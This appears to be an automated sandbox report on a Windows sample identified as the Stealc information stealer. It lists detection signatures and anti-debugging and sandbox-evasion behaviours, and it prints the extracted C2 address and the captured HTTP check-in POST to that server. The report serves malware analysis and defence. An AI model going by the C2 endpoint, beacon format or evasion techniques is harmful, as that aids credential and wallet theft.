
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562041
MD5: ec2b785f84c4c57983920f431a8f78ce
SHA1: cfc54b34762d4a0e5036a9ea5566865721cf6a9f
SHA256: 8c03b7c9bc22de662f3340049dd7fc98a640b99c0e4b58c1bf3a0d334be53ba8
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EC2B785F84C4C57983920F431A8F78CE)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source / Rule / Description / Author):
    dump.pcap / JoeSecurity_Stealc_1 / Yara detected Stealc / Joe Security
    00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
    00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
    00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
    Process Memory Space: file.exe PID: 6724 / JoeSecurity_PowershellDownloadAndExecute / Yara detected Powershell download and execute / Joe Security
    Process Memory Space: file.exe PID: 6724 / JoeSecurity_Stealc / Yara detected Stealc / Joe Security

No Sigma rule has matched

Suricata IDS alert (Timestamp / SID / Severity / Classtype / Source IP / Source Port / Destination IP / Destination Port / Protocol):
    2024-11-25T06:36:05.519429+0100 / 2044243 / 1 / Malware Command and Control Activity Detected / 192.168.2.4 / 49730 / 185.215.113.206 / 80 / TCP


AV Detection
Source: file.exe Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php$XV Avira URL Cloud: Label: malware
Source: file.exe.6724.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB4C50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB60D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FD40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FD40B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00FC6960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00FBEA30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FB9B80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00FC6B79
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FB9B20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FB7750
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FC18A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC3910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1269
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FCE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCE210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FCCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCCBE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC23A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB99
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00FC2390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC4B29
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FC4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC4B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FCD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FCD530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FCDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00FCDD30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FB16B9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16A0

Networking
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="hwid"

    0CE0801853B7671847631
    ------ECGIIIDAKJDHJKFHIEBF
    Content-Disposition: form-data; name="build"

    mars
    ------ECGIIIDAKJDHJKFHIEBF--
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB4C50
Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/L
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001BF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php$XV
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/u
Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00FB9770

System Summary
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FD48B0 0_2_00FD48B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0129C1EE 0_2_0129C1EE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012271D5 0_2_012271D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012CB022 0_2_012CB022
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0136507C 0_2_0136507C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0146C8FE 0_2_0146C8FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01370B35 0_2_01370B35
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0123E359 0_2_0123E359
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01363BD0 0_2_01363BD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01366A6A 0_2_01366A6A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013602E5 0_2_013602E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013745B0 0_2_013745B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013684F3 0_2_013684F3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01369F4F 0_2_01369F4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0136EFB9 0_2_0136EFB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01333EAC 0_2_01333EAC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012FEEF3 0_2_012FEEF3
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00FB4A60 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: quxdhurw ZLIB complexity 0.9946667435424354
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FD3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FD3A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FCCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FCCAE0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YFSDK8XQ.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe Static file information: File size 1771008 > 1048576
